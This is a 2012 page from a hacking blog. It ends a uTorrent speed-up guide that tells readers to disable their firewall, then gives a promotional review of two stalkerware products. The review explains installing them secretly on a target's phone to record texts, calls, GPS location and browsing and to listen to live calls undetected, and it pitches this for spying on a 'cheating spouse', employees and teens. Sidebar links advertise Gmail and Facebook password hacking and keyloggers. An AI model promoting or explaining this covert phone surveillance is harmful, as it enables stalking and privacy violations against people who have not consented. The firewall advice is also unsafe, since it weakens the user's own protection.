NOTE : Remember to increase torrent speed please disable firewall before you use it

3 : Click on Options in menu bar and goto Preferences,


4 : No goto Connection, In connection setting, Checked enable upnp port mapping, enable NAT-PMP port mapping and use 45682 for random port.


5 : Checked use additional upload slots if upload speed <90% and follow the value setting like screenshot.


6 : Checked for enable dht network, enable dht for new torrent, enable local peer discovery, ask tracker for scrape information, enable peer change, allow incoming legacy connections and enable outgoing protocol encryption.


7 : Set Values as given in bellow window under Queueing


8 : Setup net.max_halfopen to 90


9 : Right Click on logger click on Log Peer Traffic under Logger tab in main window of uTorrent, as shown in window,


10 : Now on Main window of uTorrent, right click on downloading file and set bandwidth allocation high


That is it, You have just boost the speed of Utorrent........

Important Note : Remember, If the torrent has no seeds, This will not work!

So friends, I hope now you get better speed than old one.Got problems in using this trick to boost Your uTorrent Download Speed??? Please mention it in comments. I will help you.

Enjoy..............


Cellphone Hacking : How to Spy on Cell Phones

Comments Posted by wildrank on Saturday, May 05, 2012
Every day I get a lot of emails from people asking how to spy on cell phone or How to hack a cellphone. To spy on a given cell phone all you need to do is install a good cell phone spy software on the target cell phone and once you do this you can silently record every SMS and information about each call. You can also see GPS positions every thirty minutes.

Today, there exists hundreds of cell phone spy softwares on the market, where many of them are nothing more than a crap. Some are good and only a few of them are the best. Also, each SpyPhone software has a different set of features and operating format which makes it hard for novice users (perhaps like you) to make the right choice so as to fit their spying needs.

So, in order to help our readers to find the best spy software, I have decided to give a thorough review of the Top 2 Best Selling SpyPhone softwares on the market.


You might be interested in some of our other articles:
Don’t forget to Subscribe to our RSS feed

Iphone / Ipad Hack : Top 2 Best Hacking SpyPhone Softwares

There exists many cell phone spy softwares on the market and hence people often get confused about which cell phone spy software to go for. To make this job simpler for you we personally tested some of the top cell phone spy software's and based on the results we conclude Spy Phone GOLD and Mobile Spy as be the best one.

1. Spy Phone GOLD 

2. Mobile Spy 


SpyPhone GOLD and Mobile Spy are the current leaders in the market which are used by thousands across the globe to spy on cheating spouse, monitor employees and keep an eye on their teens. Here is a complete review of these two products.

1: Spy Phone GOLD

Spy Phone GOLD is one of the best spy software in the world which turns any compatible cell phone into a Spy Phone within minutes. It offers every feature that a true cell phone spy software should have. Hence most people choose Spy Phone GOLD for their cell phone spying needs.





How Cell Phone Spying Works?

After your purchase, you can directly download the installation module onto the target cell phone. Installation takes only a few minutes. After installation, each activity on the target phone is recorded and uploaded onto the SpyPhone servers. You can login to your online account from your PC to view the logs at any time. The logs contain Text messages, Contacts List, Call History, GPS Locations and many such information.

Call interception: When the target cell phone is on the conversation, you will receive a secret SMS notification on your phone. At this time you can call the target phone to listen to the live conversation going on. All this process takes place in complete stealth mode and is 100% undetectable!

Spy Phone Top Features:


Listen to Live Calls : Listen in real calls! Spyera Spyphone has “Call Interception” feature. By Call Interception you will be able to listen live calls happening on the target device. You will receive a secret SMS notification whenever your target start to have an phone conversation.

GPS Location Tracking : You can track them anywhere! For devices which has include integrated GPS feature, Spyera Spyphone will use GPS positioning to show the coordinates of the device, and its physical location upon a map inside your web account. It it even possible to configure the settings for real time updates, and to display a path of travel between certain time.

SMS Logging : Records both incoming & outgoing SMS

Multilingual : Spyera Spyphone supports all languages. The SMS logs, Emails, Address Book will always be displayed correctly when viewing the captured data.

Instant Download : Download Spyphone direclt into the device. Effortless Install. All Spyera products can direct download into device by using download URL. No computer or cable required!

SIM Change Notification : Get instant notification via SMS when the target cell phone changes it’s SIM

Spy from any location across the world.

Email relay (send data to your email).

100% Undetectable & 10 day money back guarantee.

Compatible Cell Phones:

Spy Phone GOLD is fully compatible with the following mobile phones

  • Apple iPhones
  • BlackBerry Phones
  • Nokia, LG, Samsung Phones
  • Sony Ericsson Phones
  • Windows Mobile Phones


2: Mobile Spy


Although Mobile Spy Software is not as feature rich as Spy Phone GOLD Software, it also offers a good bunch of features that every spy software should have. It is a very good choice for those who are looking for a mid-range spy software at an affordable price.




How Cell Phone Spying Works?

mobile hack

Mobile Spy is a hybrid software/service which allows you to monitor your smartphone in real time. This unique system records the activities of anyone who uses your compatible iPhone, BlackBerry, Android, Windows Mobile or Symbian OS smartphone. You install a small application onto your phone. It starts at every boot of your phone but remains stealth and does not show up in the running process list.

After the software is setup on your phone it will record an array of phone activities and then silently upload the data to your private Mobile Spy account using the Internet. When you want to view results, simply login to the Online Control Panel from any computer and enter your username and password to proceed.

Mobile Spy Phone Top Features:


Calls Log : Each incoming and outgoing number is logged along with duration and time stamp.

SMS (Text Messages) Log : Every text message is logged even if the phone's logs are deleted. Includes full text.

GPS Locations Log : The device's current location is frequently logged using GPRS when signal available.

Web Site URLs Log : Each address visited in browser is logged. This feature is currently for iPhones only.

Log Summary : A summary of all activities can be shown along with separate viewers for each type.

100% Undetectable.

Compatible Cell Phones:


Spy Phone GOLD is fully compatible with the following mobile phones

  • Apple iPhones
  • BlackBerry Phones
  • Nokia, LG, Samsung Phones
  • Sony Ericsson Phones
  • Windows Mobile Phones


Comparison between Spy Phone GOLD and Mobile Spy :


Which Cell Phone Spy Software to Choose?

Its really depends upon your needs.If you want a High- tech Cellphone monitoring software i suggest you to go with Spy Phone Gold - is the right choice. Or else, if you’re looking for a mid-range spy software with basic features at an affordable price then go for Mobile Spy.

All of these softwares have 100% money back guarantee so you can try them with out any risk.So what are you waiting for? Go grab either of the two from the following links now:



Enjoy Mobile HaCkiNg.........


 
  • Gmail Hacking

    Wants to hack Gmail a/c password ? Learn best way to hack Gmail password..

  • Jailbreak Iphone/iPad

    Jailbreak your Iphone or iPad to give it more functionality free of cost...

  • Facebook Hacking

    Wants to hack Facebook password? But Don't Know Where to Start? Learn here......

  • MAC Keylogger

    Learn how to hack emails account password on MAC OS using keylogger....

  • Mobile Hacking

    Monitor mobiles,Records the activities of anyone who uses iPhone, BlackBerry....

Disclaimer

ALL INFORMATION / TUTORIALS WRITTEN ON WILDHACKER.COM ARE FOR EDUCATIONAL PURPOSES ONLY, THE SITE WILDHACKER.COM IS NOT RESPONSIBLE IN ANY WAY FOR HOW THIS INFORMATION IS USED, YOU USE IT AT YOUR OWN RISK. YOU MAY LEARN ALSO HOW TO GET YOUR OWN ACCOUNT BACK FROM ALL THIS INFRORMATION.

Recipes

Unlock Iphone Website Hacking

Facebook Hacking Keylogger

Unlock Blackberry Unlock Modem

Gmail Hacking Hack Yahoo

Hotmail Hacking Remote Hacking

Blog Archive

Traffic / Ranking

Powered by:

Wild Hacker © 2012. All Rights Reserved | Contact | Bloggers.com